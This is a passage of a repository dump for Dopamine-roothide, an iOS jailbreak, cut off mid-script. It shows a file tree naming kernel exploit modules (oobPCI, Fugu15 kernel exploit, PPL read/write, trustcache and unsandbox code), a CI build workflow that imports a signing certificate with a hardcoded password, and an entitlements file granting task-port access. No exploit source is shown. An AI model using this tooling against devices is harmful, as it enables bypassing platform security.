├── .github └── workflows │ └── main.yml ├── .gitignore ├── .gitmodules ├── .vscode ├── launch.json └── settings.json ├── BaseBin ├── .gitignore ├── _external │ ├── fallback │ │ └── CydiaSubstrate.framework │ │ │ ├── .this_is_ellekit_not_substrate │ │ │ └── CydiaSubstrate │ ├── opainject │ └── tar ├── _shared │ ├── CoreServices │ │ ├── LSApplicationProxy.h │ │ └── LSBundleProxy.h │ ├── CoreSymbolication.h │ ├── FSEvents.h │ ├── bsm │ │ ├── audit.h │ │ ├── audit_filter.h │ │ ├── audit_session.h │ │ ├── audit_uevents.h │ │ └── libbsm.h │ ├── kern_memorystatus.h │ ├── launch.h │ ├── libarchive │ │ ├── archive.h │ │ └── archive_entry.h │ ├── libellekit.tbd │ ├── libproc.h │ ├── libproc_private.h │ ├── sandbox.h │ ├── substrate.h │ └── xpc │ │ ├── XPC.apinotes │ │ ├── activity.h │ │ ├── availability.h │ │ ├── base.h │ │ ├── connection.h │ │ ├── debug.h │ │ ├── endpoint.h │ │ ├── module.modulemap │ │ ├── private.h │ │ ├── rich_error.h │ │ ├── session.h │ │ └── xpc.h ├── boomerang │ ├── Makefile │ ├── entitlements.plist │ └── src │ │ └── main.m ├── clean ├── clean.sh ├── forkfix │ ├── Makefile │ ├── src │ │ ├── litehook.c │ │ ├── litehook.h │ │ ├── main.c │ │ ├── syscall.S │ │ └── syscall.h │ └── upload.sh ├── idownloadd │ ├── Makefile │ ├── daemon.plist │ ├── entitlements.plist │ └── src │ │ ├── idownloadd.xcodeproj │ │ ├── project.pbxproj │ │ └── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── Package.resolved │ │ └── idownloadd │ │ ├── iDownloadCmds.swift │ │ ├── iDownloadKRW.swift │ │ ├── idownloadd-Bridging-Header.h │ │ └── main.swift ├── jailbreakd │ ├── Makefile │ ├── README.md │ ├── daemon.plist │ ├── entitlements.plist │ └── src │ │ ├── JBDTCPage.h │ │ ├── JBDTCPage.m │ │ ├── codesign.h │ │ ├── codesign.m │ │ ├── dyld_patch.h │ │ ├── dyld_patch.m │ │ ├── fakelib.h │ │ ├── fakelib.m │ │ ├── forkfix.h │ │ ├── forkfix.m │ │ ├── server.h │ │ ├── server.m │ │ ├── spawn_wrapper.h │ │ ├── spawn_wrapper.m │ │ ├── trustcache.h │ │ ├── trustcache.m │ │ ├── trustcache_structs.h │ │ ├── update.h │ │ └── update.m ├── jbctl │ ├── Makefile │ ├── entitlements.plist │ ├── rebuild_daemon.plist │ └── src │ │ └── main.m ├── jbinit │ ├── Makefile │ ├── entitlements.plist │ └── src │ │ ├── launchctl.h │ │ ├── launchctl.m │ │ └── main.m ├── launchdhook │ ├── Makefile │ └── src │ │ ├── boomerang.h │ │ ├── boomerang.m │ │ ├── crashreporter.h │ │ ├── crashreporter.m │ │ ├── daemon_hook.h │ │ ├── daemon_hook.m │ │ ├── ipc_hook.h │ │ ├── ipc_hook.m │ │ ├── main.m │ │ ├── spawn_hook.h │ │ ├── spawn_hook.m │ │ ├── xpc_hook.h │ │ └── xpc_hook.m ├── libfilecom │ ├── Makefile │ └── src │ │ ├── FCHandler.h │ │ └── FCHandler.m ├── libintl.8.dylib ├── libjailbreak │ ├── Makefile │ └── src │ │ ├── RemoteLog.h │ │ ├── boot_info.h │ │ ├── boot_info.m │ │ ├── csblob.h │ │ ├── handoff.h │ │ ├── handoff.m │ │ ├── jailbreakd.h │ │ ├── jailbreakd.m │ │ ├── kcall.h │ │ ├── kcall.m │ │ ├── launchd.h │ │ ├── launchd.m │ │ ├── libjailbreak.h │ │ ├── log.c │ │ ├── log.h │ │ ├── macho.h │ │ ├── macho.m │ │ ├── pac.S │ │ ├── patchfind.h │ │ ├── patchfind.m │ │ ├── pplrw.h │ │ ├── pplrw.m │ │ ├── pte.h │ │ ├── recdhash.m │ │ ├── signatures.h │ │ ├── signatures.m │ │ ├── unrestrict.m │ │ ├── unsandbox.m │ │ ├── util.h │ │ ├── util.m │ │ └── vnode.h ├── pack.sh ├── roothidehooks │ ├── .gitignore │ ├── Makefile │ ├── cfprefsd.x │ ├── common.h │ ├── common.m │ ├── installd.x │ ├── lsd.x │ ├── main.x │ ├── pathhook.x │ └── sb.x ├── systemhook │ ├── Makefile │ ├── src │ │ ├── common.c │ │ ├── common.h │ │ ├── envbuf.c │ │ ├── envbuf.h │ │ ├── launchd.h │ │ └── main.c │ └── upload.sh ├── tar ├── upload.sh └── watchdoghook │ ├── Makefile │ └── src │ └── main.m ├── Dopamine ├── .gitignore ├── Dopamine.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── Package.resolved │ └── xcshareddata │ │ └── xcschemes │ │ └── Dopamine.xcscheme ├── Dopamine │ ├── Assets.xcassets │ │ ├── AccentColor.colorset │ │ │ └── Contents.json │ │ ├── AppIcon.appiconset │ │ │ ├── 1024.png │ │ │ ├── Contents.json │ │ │ ├── icon-1024.png │ │ │ ├── icon-20-ipad.png │ │ │ ├── icon-20@2x-ipad.png │ │ │ ├── icon-20@2x.png │ │ │ ├── icon-20@3x.png │ │ │ ├── icon-29-ipad.png │ │ │ ├── icon-29.png │ │ │ ├── icon-29@2x-ipad.png │ │ │ ├── icon-29@2x.png │ │ │ ├── icon-29@3x.png │ │ │ ├── icon-40.png │ │ │ ├── icon-40@2x.png │ │ │ ├── icon-40@3x.png │ │ │ ├── icon-60@2x.png │ │ │ ├── icon-60@3x.png │ │ │ ├── icon-76.png │ │ │ ├── icon-76@2x.png │ │ │ └── icon-83.5@2x.png │ │ ├── Backgrounds │ │ │ ├── Clouds.imageset │ │ │ │ ├── Clouds@3x.jpg │ │ │ │ └── Contents.json │ │ │ ├── Contents.json │ │ │ └── Wallpaper.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── pexels-soubhagya-maharana-4124435.jpg │ │ ├── Contents.json │ │ ├── Easter Eggs │ │ │ ├── Contents.json │ │ │ └── fr.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── fr.png │ │ ├── Logos │ │ │ ├── Contents.json │ │ │ ├── DopamineLogo.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── DopamineLogo@1x.png │ │ │ │ ├── DopamineLogo@2x.png │ │ │ │ └── DopamineLogo@3x.png │ │ │ ├── DopamineLogo2.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── DopamineLogo@1x.png │ │ │ │ ├── DopamineLogo@2x.png │ │ │ │ └── DopamineLogo@3x.png │ │ │ ├── FuguTransparent.imageset │ │ │ │ ├── Artboard copy 2.png │ │ │ │ ├── Artboard copy.png │ │ │ │ ├── Artboard.png │ │ │ │ └── Contents.json │ │ │ ├── PinautenLogo.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── Pinauten_Logo_SecResearch_4096 copy 2.png │ │ │ │ ├── Pinauten_Logo_SecResearch_4096 copy.png │ │ │ │ └── Pinauten_Logo_SecResearch_4096.png │ │ │ ├── discord.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── discord-mark-white.png │ │ │ └── github.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── GitHub-Mark-64px.png │ │ ├── Package Managers │ │ │ ├── Contents.json │ │ │ ├── Sileo.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── Sileo.png │ │ │ └── Zebra.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── Zebra.png │ │ ├── Pinauten_Logo_SecResearch_1024.png │ │ ├── Pinauten_Logo_SecResearch_2048.png │ │ └── Pinauten_Logo_SecResearch_4096.png │ ├── Dopamine-Bridging-Header.h │ ├── Dopamine.entitlements │ ├── DopamineApp.swift │ ├── Info.plist │ ├── JailbreakView.swift │ ├── Preview Content │ │ └── Preview Assets.xcassets │ │ │ └── Contents.json │ ├── UI │ │ ├── Classes │ │ │ └── Logger.swift │ │ ├── Extensions │ │ │ ├── Error++.swift │ │ │ ├── TextField++.swift │ │ │ └── URLExtension+download.swift │ │ └── Views │ │ │ ├── AboutView.swift │ │ │ ├── Jailbreak.swift │ │ │ ├── JailbreakView.swift │ │ │ ├── LogView.swift │ │ │ ├── MaterialView.swift │ │ │ ├── PackageManagerSelectionView.swift │ │ │ ├── PopupView.swift │ │ │ ├── SettingsView.swift │ │ │ └── UpdateDownloadingView.swift │ ├── bootstrap │ │ ├── Dopamine.roothide │ │ ├── bootstrap-iphoneos-arm64.tar.zst │ │ ├── libjbdrw.deb │ │ ├── roothideapp.deb │ │ ├── sileo.deb │ │ └── zebra.deb │ ├── include │ │ ├── LSApplicationProxy.h │ │ ├── LSApplicationWorkspace.h │ │ ├── LSBundleProxy.h │ │ ├── _LSApplicationState.h │ │ └── posix_spawn.h │ └── main.swift ├── Makefile ├── ar.lproj │ └── Localizable.strings ├── da.lproj │ └── Localizable.strings ├── de.lproj │ └── Localizable.strings ├── el.lproj │ └── Localizable.strings ├── en.lproj │ └── Localizable.strings ├── fil.lproj │ └── Localizable.strings ├── fr.lproj │ └── Localizable.strings ├── it.lproj │ └── Localizable.strings ├── ja.lproj │ └── Localizable.strings ├── kk.lproj │ └── Localizable.strings ├── ko.lproj │ └── Localizable.strings ├── localization_keys.sh ├── nl.lproj │ └── Localizable.strings ├── pl.lproj │ └── Localizable.strings ├── pt-BR.lproj │ └── Localizable.strings ├── ru.lproj │ └── Localizable.strings ├── sort_localizations.sh ├── sv.lproj │ └── Localizable.strings ├── tr.lproj │ └── Localizable.strings ├── uk.lproj │ └── Localizable.strings ├── ur.lproj │ └── Localizable.strings ├── vi.lproj │ └── Localizable.strings ├── zh-Hans.lproj │ └── Localizable.strings ├── zh_CN.lproj │ └── Localizable.strings ├── zh_HK.lproj │ └── Localizable.strings └── zh_TW.lproj │ └── Localizable.strings ├── Exploits ├── fastPath │ ├── arm.pfx │ ├── ca.conf │ ├── clean.sh │ ├── genCrt.sh │ ├── itd.conf │ ├── usr_arm.conf │ ├── usr_x86_64.conf │ └── x86_64.pfx └── oobPCI │ ├── .gitignore │ ├── Makefile │ ├── Sources │ ├── DriverKit.c │ ├── DriverKit.h │ ├── DriverKitClasses.h │ ├── Fugu15KRW.h │ ├── asm.S │ ├── badRecovery.c │ ├── badRecovery.h │ ├── device.defs │ ├── generated │ │ ├── device.c │ │ ├── device.h │ │ ├── mach_host.c │ │ ├── mach_host.h │ │ ├── task.c │ │ ├── task.h │ │ ├── thread.c │ │ └── thread.h │ ├── includeme.h │ ├── kernel.c │ ├── kernel.h │ ├── kernrw_alloc.c │ ├── kernrw_alloc.h │ ├── mach.c │ ├── mach_host.defs │ ├── main.c │ ├── misc.c │ ├── offsets.c │ ├── offsets.h │ ├── oobPCI.c │ ├── oobPCI.h │ ├── physrw.c │ ├── physrw.h │ ├── print.c │ ├── sleep.c │ ├── sleep.h │ ├── task.defs │ ├── thread.defs │ ├── tlbFail.c │ ├── tlbFail.h │ ├── virtrw.c │ ├── virtrw.h │ └── xprr.h │ └── oobPCI.entitlements ├── LICENSE.md ├── LICENSE_Fugu15.md ├── LICENSE_libc.md ├── Makefile ├── Packages ├── Fugu15KernelExploit │ ├── .gitignore │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ └── Sources │ │ ├── CBindings │ │ ├── fcntl.m │ │ ├── include │ │ │ ├── CBindings.h │ │ │ ├── libjailbreak.h │ │ │ ├── posix_spawn.h │ │ │ ├── th_state.h │ │ │ ├── wifi.h │ │ │ ├── zdict.h │ │ │ ├── zstd.h │ │ │ └── zstd_errors.h │ │ ├── launch.h │ │ ├── libjailbreak.m │ │ ├── pci_offset.m │ │ ├── th_state.c │ │ ├── wifi.m │ │ ├── xpc │ │ │ ├── XPC.apinotes │ │ │ ├── activity.h │ │ │ ├── availability.h │ │ │ ├── base.h │ │ │ ├── connection.h │ │ │ ├── debug.h │ │ │ ├── endpoint.h │ │ │ ├── module.modulemap │ │ │ └── xpc.h │ │ └── zstd_wrapper.m │ │ └── Fugu15KernelExploit │ │ ├── Bootstrapper.swift │ │ ├── Fugu15.swift │ │ ├── KRWHandler.swift │ │ ├── Logger.swift │ │ ├── SpawnDrv │ │ ├── SpawnDrv.swift │ │ └── tp.swift │ │ ├── Util.swift │ │ ├── codelessKext.swift │ │ └── oobPCI.swift ├── KernelPatchfinder │ ├── .gitignore │ ├── LICENSE │ ├── Package.swift │ ├── README.md │ ├── Sources │ │ ├── KernelPatchfinder │ │ │ └── KernelPatchfinder.swift │ │ └── KernelPatchfinderTester │ │ │ └── main.swift │ └── Tests │ │ └── KernelPatchfinderTests │ │ └── KernelPatchfinderTests.swift ├── PatchfinderUtils │ ├── .gitignore │ ├── LICENSE │ ├── Package.swift │ ├── README.md │ └── Sources │ │ ├── CFastFind │ │ ├── CFastFind.c │ │ └── include │ │ │ └── CFastFind.h │ │ └── PatchfinderUtils │ │ ├── AArch64Instr.swift │ │ ├── Kernel.swift │ │ ├── MachO.swift │ │ └── PatchfinderSegment.swift └── ProcessCommunication │ ├── .gitignore │ ├── Package.swift │ ├── README.md │ └── Sources │ └── ProcessCommunication │ └── ProcessCommunication.swift ├── README.dev.md ├── README.md ├── Tools ├── Exe2Driver │ ├── .gitignore │ ├── Exe2Driver │ ├── Makefile │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ └── Sources │ │ └── Exe2Driver │ │ └── main.swift ├── Makefile ├── Makefile.inc ├── fastPathSign │ ├── .gitignore │ ├── Makefile │ ├── Package.swift │ ├── README.md │ ├── Sources │ │ ├── Security_Codesign │ │ │ ├── SecCodeSigner.h │ │ │ └── module.modulemap │ │ └── fastPathSign │ │ │ └── main.swift │ └── fastPathSign └── installHaxx │ ├── .gitignore │ ├── Makefile │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ ├── Sources │ └── installHaxx │ │ └── main.swift │ └── installHaxx ├── banner.png └── jbupdate.sh /.github/workflows/main.yml: -------------------------------------------------------------------------------- 1 | name: "Dopamine: build and upload" 2 | 3 | on: 4 | push: 5 | branches: 6 | - master 7 | paths-ignore: 8 | - ".gitignore" 9 | pull_request: 10 | branches: 11 | - master 12 | paths-ignore: 13 | - ".gitignore" 14 | workflow_dispatch: 15 | schedule: 16 | - cron: '0 0 1 1 *' 17 | - cron: '0 0 1 4 *' 18 | - cron: '0 0 30 6 *' 19 | - cron: '0 0 28 9 *' 20 | - cron: '0 0 27 12 *' 21 | 22 | concurrency: 23 | group: ${{ github.workflow }}-${{ github.ref }} 24 | cancel-in-progress: true 25 | 26 | jobs: 27 | build: 28 | runs-on: macos-latest 29 | steps: 30 | - name: Checkout 31 | uses: actions/checkout@v3 32 | 33 | - name: Install Procursus 34 | uses: dhinakg/procursus-action@main 35 | with: 36 | packages: ldid findutils sed coreutils trustcache make 37 | 38 | - name: Install THEOS (without SDKs) 39 | run: | 40 | set -x 41 | export BASEDIR="$(pwd)" 42 | export THEOS="${BASEDIR}/theos" 43 | mkdir -p $THEOS 44 | curl -fsSL https://raw.githubusercontent.com/theos/theos/master/bin/install-theos >> install-theos.sh 45 | gsed -E "/^\s*get_theos\s*$/,+1 s/^(\s*)(get_sdks)\s*$/\1mkdir -p \${THEOS}\/sdks\n\1touch \${THEOS}\/sdks\/sdk\n\1\2/g" -i install-theos.sh 46 | bash install-theos.sh 47 | cd $BASEDIR 48 | 49 | - name: Set Environment Variables 50 | run: | 51 | set -x 52 | T2=$(TZ=UTC-2 date +'%Y%m%d_%H%M%S') 53 | TS=$(date -j -f "%Y%m%d_%H%M%S" "${T2}" +%s) 54 | SHASH=$(git rev-parse --short HEAD) 55 | echo "ctime=${T2}" >> $GITHUB_ENV 56 | echo "ctimestamp=${TS}" >> $GITHUB_ENV 57 | echo "shorthash=${SHASH}" >> $GITHUB_ENV 58 | 59 | - name: Build 60 | run: | 61 | set -x 62 | sudo security import Exploits/fastPath/arm.pfx -k /Library/Keychains/System.keychain -P password -A 63 | export BASEDIR="$(pwd)" 64 | export THEOS="${BASEDIR}/theos" 65 | gmake -j$(sysctl -n hw.physicalcpu) 66 | cp -a Dopamine/Dopamine.tipa Dopamine/Dopamine_${{ env.shorthash }}_${{ env.ctime }}.tipa 67 | cp -a Dopamine/Dopamine.tipa Dopamine/Dopamine_Latest.tipa 68 | 69 | - name: Upload Latest Artifact 70 | id: dopamine-latest-upload 71 | uses: actions/upload-artifact@v3 72 | with: 73 | name: Dopamine_Latest 74 | path: | 75 | ${{ github.workspace }}/Dopamine/Dopamine_Latest.tipa 76 | - name: Upload Hashed Artifact 77 | id: dopamine-hashed-upload 78 | uses: actions/upload-artifact@v3 79 | with: 80 | name: Dopamine_${{ env.shorthash }}_${{ env.ctime }} 81 | path: | 82 | ${{ github.workspace }}/Dopamine/Dopamine_${{ env.shorthash }}_${{ env.ctime }}.tipa 83 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/ 7 | /Package.resolved 8 | /Server/orig.ipa 9 | /Server/serverCert/fullchain.cer 10 | /Server/serverCert/server.key 11 | Dopamine/Dopamine/bootstrap/tmp/ 12 | .idea 13 | Tools/fastPathSign/.build_* 14 | BaseBin/upload.sh 15 | .vscode/settings.json 16 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "BaseBin/ChOma"] 2 | path = BaseBin/ChOma 3 | url = https://github.com/opa334/ChOma 4 | -------------------------------------------------------------------------------- /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "files.associations": { 3 | "dyld.h": "c", 4 | "termios.h": "c", 5 | "_pid_t.h": "c", 6 | "_types.h": "c", 7 | "cdefs.h": "c", 8 | "util.h": "c", 9 | "filesystem": "c", 10 | "chrono": "c", 11 | "driverkit.h": "c", 12 | "mach.h": "c", 13 | "syslog.h": "c", 14 | "stdbool.h": "c", 15 | "device.h": "c", 16 | "includeme.h": "c", 17 | "paths.h": "c", 18 | "common.h": "c", 19 | "__config": "c", 20 | "_pthread_types.h": "c" 21 | } 22 | } -------------------------------------------------------------------------------- /BaseBin/.gitignore: -------------------------------------------------------------------------------- 1 | basebin.tc 2 | libjailbreak/libjailbreak.dylib 3 | jailbreakd/jailbreakd 4 | jbinit/jbinit 5 | jbctl/jbctl 6 | launchdhook/launchdhook.dylib 7 | forkfix/forkfix.dylib 8 | systemhook/systemhook.dylib 9 | watchdoghook/watchdoghook.dylib 10 | libfilecom/libfilecom.dylib 11 | boomerang/boomerang 12 | idownloadd/idownloadd 13 | idownloadd/.build.xcarchive 14 | _shared/libjailbreak 15 | _shared/libfilecom 16 | _shared/ChOma 17 | .tmp -------------------------------------------------------------------------------- /BaseBin/_external/fallback/CydiaSubstrate.framework/.this_is_ellekit_not_substrate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/_external/fallback/CydiaSubstrate.framework/.this_is_ellekit_not_substrate -------------------------------------------------------------------------------- /BaseBin/_external/fallback/CydiaSubstrate.framework/CydiaSubstrate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/_external/fallback/CydiaSubstrate.framework/CydiaSubstrate -------------------------------------------------------------------------------- /BaseBin/_external/opainject: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/_external/opainject -------------------------------------------------------------------------------- /BaseBin/_external/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/_external/tar -------------------------------------------------------------------------------- /BaseBin/_shared/CoreServices/LSApplicationProxy.h: -------------------------------------------------------------------------------- 1 | #import "LSBundleProxy.h" 2 | @interface LSApplicationProxy : LSBundleProxy 3 | + (instancetype)applicationProxyForIdentifier:(NSString *)identifier; 4 | @end -------------------------------------------------------------------------------- /BaseBin/_shared/CoreServices/LSBundleProxy.h: -------------------------------------------------------------------------------- 1 | @interface LSBundleProxy : NSObject 2 | @property (nonatomic) NSURL *bundleURL; 3 | @property (nonatomic,readonly) NSString *bundleExecutable; 4 | @end -------------------------------------------------------------------------------- /BaseBin/_shared/libproc_private.h: -------------------------------------------------------------------------------- 1 | struct proc_bsdinfo { 2 | uint32_t pbi_flags; /* 64bit; emulated etc */ 3 | uint32_t pbi_status; 4 | uint32_t pbi_xstatus; 5 | uint32_t pbi_pid; 6 | uint32_t pbi_ppid; 7 | uid_t pbi_uid; 8 | gid_t pbi_gid; 9 | uid_t pbi_ruid; 10 | gid_t pbi_rgid; 11 | uid_t pbi_svuid; 12 | gid_t pbi_svgid; 13 | uint32_t rfu_1; /* reserved */ 14 | char pbi_comm[MAXCOMLEN]; 15 | char pbi_name[2 * MAXCOMLEN]; /* empty if no name is registered */ 16 | uint32_t pbi_nfiles; 17 | uint32_t pbi_pgid; 18 | uint32_t pbi_pjobc; 19 | uint32_t e_tdev; /* controlling tty dev */ 20 | uint32_t e_tpgid; /* tty process group id */ 21 | int32_t pbi_nice; 22 | uint64_t pbi_start_tvsec; 23 | uint64_t pbi_start_tvusec; 24 | }; 25 | 26 | #define PROC_PIDTBSDINFO 3 27 | #define PROC_PIDTBSDINFO_SIZE (sizeof(struct proc_bsdinfo)) -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/XPC.apinotes: -------------------------------------------------------------------------------- 1 | Name: XPC 2 | Functions: 3 | # xpc_object 4 | - Name: xpc_retain 5 | Availability: nonswift 6 | - Name: xpc_release 7 | Availability: nonswift 8 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/debug.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_DEBUG_H__ 2 | #define __XPC_DEBUG_H__ 3 | 4 | /*! 5 | * @function xpc_debugger_api_misuse_info 6 | * Returns a pointer to a string describing the reason XPC aborted the calling 7 | * process. On OS X, this will be the same string present in the "Application 8 | * Specific Information" section of the crash report. 9 | * 10 | * @result 11 | * A pointer to the human-readable string describing the reason the caller was 12 | * aborted. If XPC was not responsible for the program's termination, NULL will 13 | * be returned. 14 | * 15 | * @discussion 16 | * This function is only callable from within a debugger. It is not meant to be 17 | * called by the program directly. 18 | */ 19 | XPC_DEBUGGER_EXCL 20 | const char * 21 | xpc_debugger_api_misuse_info(void); 22 | 23 | #endif // __XPC_DEBUG_H__ 24 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_ENDPOINT_H__ 2 | #define __XPC_ENDPOINT_H__ 3 | 4 | /*! 5 | * @function xpc_endpoint_create 6 | * Creates a new endpoint from a connection that is suitable for embedding into 7 | * messages. 8 | * 9 | * @param connection 10 | * Only connections obtained through calls to xpc_connection_create*() may be 11 | * given to this API. Passing any other type of connection is not supported and 12 | * will result in undefined behavior. 13 | * 14 | * @result 15 | * A new endpoint object. 16 | */ 17 | __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) 18 | XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 19 | xpc_endpoint_t _Nonnull 20 | xpc_endpoint_create(xpc_connection_t _Nonnull connection); 21 | 22 | #endif // __XPC_ENDPOINT_H__ 23 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/module.modulemap: -------------------------------------------------------------------------------- 1 | module XPC [system] [extern_c] { 2 | header "xpc.h" 3 | header "availability.h" 4 | header "base.h" 5 | header "activity.h" 6 | header "connection.h" 7 | header "debug.h" 8 | header "endpoint.h" 9 | export * 10 | } 11 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/private.h: -------------------------------------------------------------------------------- 1 | void xpc_dictionary_get_audit_token(xpc_object_t xdict, audit_token_t *token); 2 | char *xpc_strerror (int); 3 | 4 | extern XPC_RETURNS_RETAINED xpc_object_t xpc_pipe_create_from_port(mach_port_t port, uint32_t flags); 5 | extern int xpc_pipe_simpleroutine(xpc_object_t pipe, xpc_object_t message); 6 | extern int xpc_pipe_routine(xpc_object_t pipe, xpc_object_t message, XPC_GIVES_REFERENCE xpc_object_t *reply); 7 | extern int xpc_pipe_routine_with_flags(xpc_object_t xpc_pipe, xpc_object_t inDict, XPC_GIVES_REFERENCE xpc_object_t *reply, uint32_t flags); 8 | extern int xpc_pipe_routine_reply(xpc_object_t reply); 9 | extern int xpc_pipe_receive(mach_port_t port, XPC_GIVES_REFERENCE xpc_object_t *message); 10 | 11 | extern XPC_RETURNS_RETAINED xpc_object_t xpc_copy_entitlement_for_token(const char *, audit_token_t *); -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/rich_error.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_RICH_ERROR_H__ 2 | #define __XPC_RICH_ERROR_H__ 3 | 4 | #ifndef __XPC_INDIRECT__ 5 | #error "Please #include instead of this file directly." 6 | // For HeaderDoc. 7 | #include 8 | #endif // __XPC_INDIRECT__ 9 | 10 | #ifndef __BLOCKS__ 11 | #error "XPC Rich Errors require Blocks support." 12 | #endif // __BLOCKS__ 13 | 14 | XPC_ASSUME_NONNULL_BEGIN 15 | __BEGIN_DECLS 16 | 17 | #pragma mark Properties 18 | /*! 19 | * @function xpc_rich_error_copy_description 20 | * Copy the string description of an error. 21 | * 22 | * @param error 23 | * The error to be examined. 24 | * 25 | * @result 26 | * The underlying C string for the provided error. This string should be 27 | * disposed of with free(3) when done. 28 | * 29 | * This will return NULL if a string description could not be generated. 30 | */ 31 | XPC_EXPORT XPC_WARN_RESULT 32 | char * _Nullable 33 | xpc_rich_error_copy_description(xpc_rich_error_t error); 34 | 35 | /*! 36 | * @function xpc_rich_error_can_retry 37 | * Whether the operation the error originated from can be retried. 38 | * 39 | * @param error 40 | * The error to be inspected. 41 | * 42 | * @result 43 | * Whether the operation the error originated from can be retried. 44 | */ 45 | XPC_EXPORT XPC_WARN_RESULT 46 | bool 47 | xpc_rich_error_can_retry(xpc_rich_error_t error); 48 | 49 | __END_DECLS 50 | XPC_ASSUME_NONNULL_END 51 | 52 | #endif // __XPC_RICH_ERROR_H__ 53 | -------------------------------------------------------------------------------- /BaseBin/boomerang/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = boomerang 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -O2 6 | LDFLAGS = -L../libjailbreak -ljailbreak -L../libfilecom -lfilecom 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/boomerang/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | 8 | task_for_pid-allow 9 | 10 | com.apple.system-task-ports 11 | 12 | com.apple.system-task-ports.control 13 | 14 | 15 | com.apple.private.security.no-container 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/clean: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -e 4 | 5 | PREV_DIR=$(pwd) 6 | PACK_DIR=$(dirname -- "$0") 7 | cd "$PACK_DIR" 8 | 9 | # libfilecom 10 | cd "libfilecom" 11 | make clean 12 | cd - 13 | 14 | # libjailbreak 15 | cd "libjailbreak" 16 | make clean 17 | cd - 18 | 19 | # jailbreakd 20 | cd "jailbreakd" 21 | make clean 22 | cd - 23 | 24 | # jailbreakd 25 | cd "idownloadd" 26 | make clean 27 | cd - 28 | 29 | # boomerang 30 | cd "boomerang" 31 | make clean 32 | cd - 33 | 34 | # jbinit 35 | cd "jbinit" 36 | make clean 37 | cd - 38 | 39 | # jbctl 40 | cd "jbctl" 41 | make clean 42 | cd - 43 | 44 | # launchdhook 45 | cd "launchdhook" 46 | make clean 47 | cd - 48 | 49 | # systemhook 50 | cd "systemhook" 51 | make clean 52 | cd - 53 | 54 | # watchdoghook 55 | cd "watchdoghook" 56 | make clean 57 | cd - 58 | 59 | # roothidehooks 60 | cd "roothidehooks" 61 | make clean 62 | cd - 63 | 64 | # forkfix 65 | cd "forkfix" 66 | make clean 67 | cd - 68 | 69 | cd "$PREV_DIR" -------------------------------------------------------------------------------- /BaseBin/clean.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -e 4 | 5 | PREV_DIR=$(pwd) 6 | PACK_DIR=$(dirname -- "$0") 7 | cd "$PACK_DIR" 8 | 9 | # libfilecom 10 | cd "libfilecom" 11 | make clean 12 | cd - 13 | 14 | # libjailbreak 15 | cd "libjailbreak" 16 | make clean 17 | cd - 18 | 19 | # jailbreakd 20 | cd "jailbreakd" 21 | make clean 22 | cd - 23 | 24 | # jailbreakd 25 | cd "idownloadd" 26 | make clean 27 | cd - 28 | 29 | # boomerang 30 | cd "boomerang" 31 | make clean 32 | cd - 33 | 34 | # jbinit 35 | cd "jbinit" 36 | make clean 37 | cd - 38 | 39 | # jbctl 40 | cd "jbctl" 41 | make clean 42 | cd - 43 | 44 | # launchdhook 45 | cd "launchdhook" 46 | make clean 47 | cd - 48 | 49 | # systemhook 50 | cd 